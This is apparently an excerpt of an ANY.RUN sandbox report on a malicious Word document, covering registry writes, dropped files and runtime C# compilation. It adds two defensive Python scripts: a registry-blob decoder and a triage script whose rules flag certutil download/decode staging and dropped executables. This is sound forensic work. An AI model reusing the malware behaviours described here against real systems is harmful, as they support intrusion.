c:\windows\system32\uxtheme.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winmm.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\oleacc.dll

Registry activity

Total events
730
Read events
699
Write events
31
Delete events
0

Modification events

PID
Process
Operation
Key
Name
Value
3328
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
yz>
797A3E00000D0000010000000000000000000000
3328
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
3328
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
3328
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
WORDFiles
1321992222
3328
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1321992336
3328
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1321992337
3328
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
000D00003E61F9D2BF20D50100000000
3328
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
>|>
3E7C3E00000D000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
3328
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3328
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3328
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
5~>
357E3E00000D00000600000001000000DE00000002000000CE0000000400000063003A005C00750073006500720073005C00610064006D0069006E005C0061007000700064006100740061005C006C006F00630061006C005C00740065006D0070005C0065003700300039003000350039003000350035003100640062003500390038003600350033003700630066003500390037003900660037006600330036003700620032003200630031006300380032003300310062006600610035003800620030003300320034003400390066003100350064003700630038003800360061002E0064006F006300000000000000
3328
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1321992338
3328
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1321992339
3328
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
TCWP5FilesIntl_1033
1321992193
3328
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
TCWP6FilesIntl_1033
1321992193
3328
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
TCWP5FilesIntl_1033
1321992194
3328
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
TCWP6FilesIntl_1033
1321992194
3328
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
TCWP5FilesIntl_1033
1321992195
3328
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
TCWP6FilesIntl_1033
1321992195
3328
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
VBAFiles
1321992196
3328
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
{D056BC21-229C-4F48-A080-DD33C3C5FE94}
3328
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Max Display
25
3328
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Max Display
25
3328
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\11F7FA
11F7FA
04000000000D00006600000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C0065003700300039003000350039003000350035003100640062003500390038003600350033003700630066003500390037003900660037006600330036003700620032003200630031006300380032003300310062006600610035003800620030003300320034003400390066003100350064003700630038003800360061002E0064006F0063004400000065003700300039003000350039003000350035003100640062003500390038003600350033003700630066003500390037003900660037006600330036003700620032003200630031006300380032003300310062006600610035003800620030003300320034003400390066003100350064003700630038003800360061002E0064006F0063000000000001000000000000002213EBD2BF20D501FAF71100FAF7110000000000DB040000000000000000000000000000000000000000000000000000FFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFF
1916
weXfvlHFdeZDapgOMUTXuEy.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
1916
weXfvlHFdeZDapgOMUTXuEy.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
1152
calc.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Calc
Window_Placement
2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF6E0000005C0000008E030000B4020000
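
The Resiliency\StartupItems, Resiliency\DocumentRecovery and MTTT values above are binary blobs, but they are the registry's record of which document Word had open and when: each carries a UTF-16LE path, and two of them carry a Windows FILETIME. Decoding them is routine when reconstructing user activity from a hive, and the script below does it for the three values as copied from the table (the DocumentRecovery blob is trimmed to its first 392 bytes; the long tail shown in the table is padding). It is an added example, not part of the ANY.RUN report. The string carve and the FILETIME scan are generic; the field layout used for DocumentRecovery (three DWORDs, a length-prefixed path, a length-prefixed file name, three DWORDs, a FILETIME, then a record id that matches the 11F7FA subkey name) is inferred from this one blob and is an assumption rather than a documented Office format.

```python
"""Decode the Word Resiliency, DocumentRecovery and MTTT registry values listed above."""
import re
import struct
from datetime import datetime, timedelta, timezone

# The document's SHA256 file name "e7090590...7c886a" as UTF-16LE hex, exactly as it appears
# inside three of the blobs above; factored out only to keep this listing short.
HASH_U16 = ("65003700300039003000350039003000" "35003500310064006200350039003800"
            "36003500330037006300660035003900" "37003900660037006600330036003700"
            "62003200320063003100630038003200" "33003100620066006100350038006200"
            "30003300320034003400390066003100" "35006400370063003800380036006100")
DOC_U16 = "2E0064006F006300"  # ".doc"

# Values copied verbatim from the registry-activity table above (PID 3328, WINWORD.EXE).
MTTT = "000D00003E61F9D2BF20D50100000000"  # HKCU\Software\Microsoft\Office\14.0\Word, MTTT
STARTUP_NORMAL = (  # ...\Word\Resiliency\StartupItems, value name ">|>"
    "3E7C3E00000D000004000000000000008C0000000100000084000000"
    "3E0043003A005C00550073006500720073005C00610064006D0069006E005C00"
    "41007000700044006100740061005C0052006F0061006D0069006E0067005C00"
    "4D006900630072006F0073006F00660074005C00540065006D0070006C006100"
    "7400650073005C004E006F0072006D0061006C002E0064006F0074006D00" "000000000000")
STARTUP_DOC = (  # ...\Word\Resiliency\StartupItems, value name "5~>"
    "357E3E00000D00000600000001000000DE00000002000000CE00000004000000"
    "63003A005C00750073006500720073005C00610064006D0069006E005C006100"
    "7000700064006100740061005C006C006F00630061006C005C00740065006D00"
    "70005C00" + HASH_U16 + DOC_U16 + "000000000000")
# ...\Word\Resiliency\DocumentRecovery\11F7FA: the first 392 bytes of the value; the long
# tail shown in the table is padding and is not needed here.
DOC_RECOVERY = (
    "04000000000D000066000000"
    "43003A005C00550073006500720073005C00610064006D0069006E005C004100"
    "7000700044006100740061005C004C006F00630061006C005C00540065006D00"
    "70005C00" + HASH_U16 + DOC_U16
    + "44000000" + HASH_U16 + DOC_U16
    + "000000000100000000000000" "2213EBD2BF20D501" "FAF71100FAF7110000000000DB040000")

EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft: int) -> datetime:
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) to an aware datetime."""
    return EPOCH_1601 + timedelta(microseconds=ft // 10)


def carve_utf16(blob: bytes, min_chars: int = 8) -> list:
    """Printable UTF-16LE runs of at least min_chars characters, in order of appearance.
    Generic and layout-agnostic, so a printable length byte right after a string
    (0x44 'D' in the DocumentRecovery blob) ends up glued to it."""
    pattern = rb"(?:[\x20-\x7e]\x00){%d,}" % min_chars
    return [m.group().decode("utf-16-le") for m in re.finditer(pattern, blob)]


def find_filetimes(blob: bytes, lo=datetime(2000, 1, 1, tzinfo=timezone.utc),
                   hi=datetime(2038, 1, 1, tzinfo=timezone.utc)) -> list:
    """Scan every byte offset for a little-endian u64 that is a FILETIME in [lo, hi).
    The window is narrow enough that UTF-16 text, counters and lengths do not match."""
    lo_ft = (lo - EPOCH_1601) // timedelta(microseconds=1) * 10
    hi_ft = (hi - EPOCH_1601) // timedelta(microseconds=1) * 10
    hits = []
    for off in range(len(blob) - 7):
        (ft,) = struct.unpack_from("<Q", blob, off)
        if lo_ft <= ft < hi_ft:
            hits.append((off, filetime_to_datetime(ft)))
    return hits


def parse_document_recovery(blob: bytes) -> dict:
    """Layout inferred from the DocumentRecovery\\11F7FA blob on this page (an assumption,
    not a documented format): u32, u32, u32 path_chars, UTF-16LE path, u32 name_chars,
    UTF-16LE name, three u32, FILETIME, u32 record id (the same number as the subkey name)."""
    _, _, path_chars = struct.unpack_from("<III", blob, 0)
    off = 12
    path = blob[off:off + 2 * path_chars].decode("utf-16-le")
    off += 2 * path_chars
    (name_chars,) = struct.unpack_from("<I", blob, off)
    off += 4
    name = blob[off:off + 2 * name_chars].decode("utf-16-le")
    off += 2 * name_chars + 12
    ft, rec_id = struct.unpack_from("<QI", blob, off)
    return {"path": path, "name": name, "time": filetime_to_datetime(ft), "id": f"{rec_id:X}"}


if __name__ == "__main__":
    for label, hexval in (("MTTT", MTTT), ("StartupItems >|>", STARTUP_NORMAL),
                          ("StartupItems 5~>", STARTUP_DOC), ("DocumentRecovery", DOC_RECOVERY)):
        blob = bytes.fromhex(hexval)
        print(label, carve_utf16(blob), find_filetimes(blob))
    print(parse_document_recovery(bytes.fromhex(DOC_RECOVERY)))
```

Both FILETIMEs decode to 2019-06-12 01:40:32 UTC, which is consistent with the 03:40:09 analysis time in the header if that time is displayed in a UTC+2 zone. The carve alone returns the DocumentRecovery path with a stray "D" appended, because the 0x44 length prefix of the file name that follows is a printable byte; that is why the structured parser is the one to trust for that value, and the carve is the fallback for blobs whose layout you have not worked out.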

Files activity

Executable files
1
Suspicious files
0
Text files
17
Unknown types
2

Dropped files

PID  Process  Filename  Type  MD5 / SHA256
3656  cmd.exe  C:\Windows\Tasks\weXfvlHFdeZDapgOMUTXuEy.exe  executable  MD5: 0517ef5a34a4ed8e9aacfa71201a23c9  SHA256: 70eccabe83df280dd393aa683cf9a408f766e015ffec4f78f0444bd46e3fa4fa
3328  WINWORD.EXE  C:\Users\admin\AppData\Local\Temp\CVRF2D9.tmp.cvr  ––  MD5: ––  SHA256: ––
3856  cvtres.exe  C:\Users\admin\AppData\Local\Temp\RES596.tmp  ––  MD5: ––  SHA256: ––
676  csc.exe  C:\Users\admin\AppData\Local\Temp\mxq0ngbg.pdb  ––  MD5: ––  SHA256: ––
676  csc.exe  C:\Users\admin\AppData\Local\Temp\CSCF85D058A7E984FFE93CC9BB1D9A5AF.TMP  ––  MD5: ––  SHA256: ––
1916  weXfvlHFdeZDapgOMUTXuEy.exe  C:\Users\admin\AppData\Local\Temp\mxq0ngbg.cmdline  text  MD5: 364ef89e47abc201d2f214abfd1c703d  SHA256: bab67207755af82260cb1ff308e5b0ccb0827ce5019183b9bb0bb7794723b8b1
1916  weXfvlHFdeZDapgOMUTXuEy.exe  C:\Users\admin\AppData\Local\Temp\mxq0ngbg.0.cs  text  MD5: 03086a5a827f697b396810d4a9618f36  SHA256: 866853d6663eed4469ed05ad2ce9f7fc615a77fb996e89c679f34b63b56bf9ad
1136  csc.exe  C:\Users\admin\AppData\Local\Temp\sbfymty2.out  ––  MD5: ––  SHA256: ––
1136  csc.exe  C:\Users\admin\AppData\Local\Temp\sbfymty2.dll  ––  MD5: ––  SHA256: ––
2992  cvtres.exe  C:\Users\admin\AppData\Local\Temp\RES41F.tmp  ––  MD5: ––  SHA256: ––
1136  csc.exe  C:\Users\admin\AppData\Local\Temp\CSC62941A302B5744F3BCDAF94F24BED6.TMP  ––  MD5: ––  SHA256: ––
1136  csc.exe  C:\Users\admin\AppData\Local\Temp\sbfymty2.pdb  ––  MD5: ––  SHA256: ––
1916  weXfvlHFdeZDapgOMUTXuEy.exe  C:\Users\admin\AppData\Local\Temp\sbfymty2.cmdline  text  MD5: 4c5bfdcbca50c96483fc95cbea78f0be  SHA256: eeef89c2ce35fbe9d28410e998319878e963c1de2462e54947f0ff94436783c4
1916  weXfvlHFdeZDapgOMUTXuEy.exe  C:\Users\admin\AppData\Local\Temp\sbfymty2.0.cs  text  MD5: 74ad493bf142fc63b8c4851b9909bcc1  SHA256: 4f29ddcd98f577adc0e4afcc6bf2f18a5fd8f12140603953a7422a933d019d95
676  csc.exe  C:\Users\admin\AppData\Local\Temp\mxq0ngbg.out  ––  MD5: ––  SHA256: ––
3264  certutil.exe  C:\Users\admin\AppData\Local\Temp\UpLkHEF  text  MD5: 47cb4c9e88aff578ffb0b8e7104717f6  SHA256: 11876529b6ea5ab398e48c5f6945c1d13f5cd5d1ebef08c1f43b1865e04d5126
3656  cmd.exe  C:\Users\admin\AppData\Local\Temp\LKyigCFSSVDvtJb  text  MD5: 4a4a61e4ed4562bd5d5f2d9ba9d1d538  SHA256: 8a37525da48dce5af0b90e8e891eb67dc7a9296036ce7100d1ab13b6a080b697
1928  cmd.exe  C:\Users\admin\AppData\Local\Temp\LKyigCFSSVDvtJb  text  MD5: 4a4a61e4ed4562bd5d5f2d9ba9d1d538  SHA256: 8a37525da48dce5af0b90e8e891eb67dc7a9296036ce7100d1ab13b6a080b697
3328  WINWORD.EXE  C:\Users\admin\AppData\Local\Temp\~$090590551db5986537cf5979f7f367b22c1c8231bfa58b032449f15d7c886a.doc  pgc  MD5: 3a22272b94d8c56c5eff52ced9076a78  SHA256: c7ccc6877040d6f0ab398b0e8fd4283c2cf2e85663960d410afe58dfb45aa2a8
3328  WINWORD.EXE  C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm  pgc  MD5: c111f99cd469831004e4547e39009b06  SHA256: 3479c3cb813b5d1c331b8400a690378d71df89f98184e62788f05713d903f6af
676  csc.exe  C:\Users\admin\AppData\Local\Temp\mxq0ngbg.dll  ––  MD5: ––  SHA256: ––
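
Three things in that table are worth pulling out during triage: cmd.exe writing an executable into C:\Windows\Tasks, certutil.exe writing a file into the user's Temp directory, and the freshly dropped weXfvlHFdeZDapgOMUTXuEy.exe writing <stem>.cmdline and <stem>.0.cs files that csc.exe and cvtres.exe then turn into <stem>.dll and <stem>.pdb, which is the file set left behind when a .NET program compiles C# at run time through CodeDom. The script below is an added triage example, not ANY.RUN's detection logic; the records are copied from the table (hashes omitted), and the rule names, the list of expected executable directories and the set of recognised build tools are the editor's choices.

```python
"""Triage the dropped-file records above for three patterns that deserve a closer look."""
import ntpath
import re
from collections import defaultdict

# (pid, process, path, type) copied from the Dropped files table; a type of "––" becomes None
# and the hashes are left out because the rules below do not use them.
DROPPED = [
    (3656, "cmd.exe", r"C:\Windows\Tasks\weXfvlHFdeZDapgOMUTXuEy.exe", "executable"),
    (3328, "WINWORD.EXE", r"C:\Users\admin\AppData\Local\Temp\CVRF2D9.tmp.cvr", None),
    (3856, "cvtres.exe", r"C:\Users\admin\AppData\Local\Temp\RES596.tmp", None),
    (676, "csc.exe", r"C:\Users\admin\AppData\Local\Temp\mxq0ngbg.pdb", None),
    (1916, "weXfvlHFdeZDapgOMUTXuEy.exe", r"C:\Users\admin\AppData\Local\Temp\mxq0ngbg.cmdline", "text"),
    (1916, "weXfvlHFdeZDapgOMUTXuEy.exe", r"C:\Users\admin\AppData\Local\Temp\mxq0ngbg.0.cs", "text"),
    (1136, "csc.exe", r"C:\Users\admin\AppData\Local\Temp\sbfymty2.dll", None),
    (1916, "weXfvlHFdeZDapgOMUTXuEy.exe", r"C:\Users\admin\AppData\Local\Temp\sbfymty2.cmdline", "text"),
    (1916, "weXfvlHFdeZDapgOMUTXuEy.exe", r"C:\Users\admin\AppData\Local\Temp\sbfymty2.0.cs", "text"),
    (676, "csc.exe", r"C:\Users\admin\AppData\Local\Temp\mxq0ngbg.dll", None),
    (3264, "certutil.exe", r"C:\Users\admin\AppData\Local\Temp\UpLkHEF", "text"),
    (3656, "cmd.exe", r"C:\Users\admin\AppData\Local\Temp\LKyigCFSSVDvtJb", "text"),
    (3328, "WINWORD.EXE", r"C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm", "pgc"),
]

# Editor's choices, not a vendor list: where an installed executable is expected to land,
# and which compilers are allowed to write compiler input files.
EXPECTED_EXE_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
                     "c:\\program files\\", "c:\\program files (x86)\\")
BUILD_TOOLS = {"csc.exe", "vbc.exe", "cvtres.exe", "msbuild.exe", "devenv.exe"}
USER_TEMP = "\\appdata\\local\\temp\\"
CODEDOM_INPUT = re.compile(r"([a-z0-9_]+)\.(cmdline|0\.cs)")


def triage(records):
    """Return (rule, pid, process, detail) tuples in the order the evidence appears."""
    findings = []
    # Runtime C# compilation through CodeDom leaves <stem>.cmdline and <stem>.0.cs written by
    # the host program, which csc.exe then turns into <stem>.dll; pair them up on the stem.
    compile_units = defaultdict(dict)
    for pid, proc, path, ftype in records:
        low = path.lower()
        if ftype == "executable" and not low.startswith(EXPECTED_EXE_DIRS):
            findings.append(("exe-dropped-outside-program-dirs", pid, proc, path))
        if proc.lower() == "certutil.exe" and USER_TEMP in low:
            # certutil writing into %TEMP% is what a -decode or -urlcache stage looks like in
            # a file-activity table; the command line is not in this report, so it is a lead.
            findings.append(("certutil-writes-user-temp", pid, proc, path))
        m = CODEDOM_INPUT.fullmatch(ntpath.basename(low))
        if m and proc.lower() not in BUILD_TOOLS:
            compile_units[m.group(1)][m.group(2)] = (pid, proc)
    for stem, parts in sorted(compile_units.items()):
        if {"cmdline", "0.cs"} <= set(parts):
            pid, proc = parts["0.cs"]
            findings.append(("runtime-csharp-compile", pid, proc, stem))
    return findings


if __name__ == "__main__":
    for rule, pid, proc, detail in triage(DROPPED):
        print(f"{rule:34} pid={pid:<5} {proc:28} {detail}")
```

Run against the table it yields four findings: the executable in C:\Windows\Tasks, the certutil write, and one runtime-compile finding per stem (mxq0ngbg and sbfymty2), both attributed to PID 1916. The compile rule keys on the host process that writes the .cmdline and .0.cs pair rather than on csc.exe itself, because csc.exe is a legitimate binary that developers and installers run all day; what is unusual is a just-dropped executable feeding it source.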

Find more information on the static content, and download it, in the full report

Network activity

HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

No network activity.

Debug output strings

No debug info.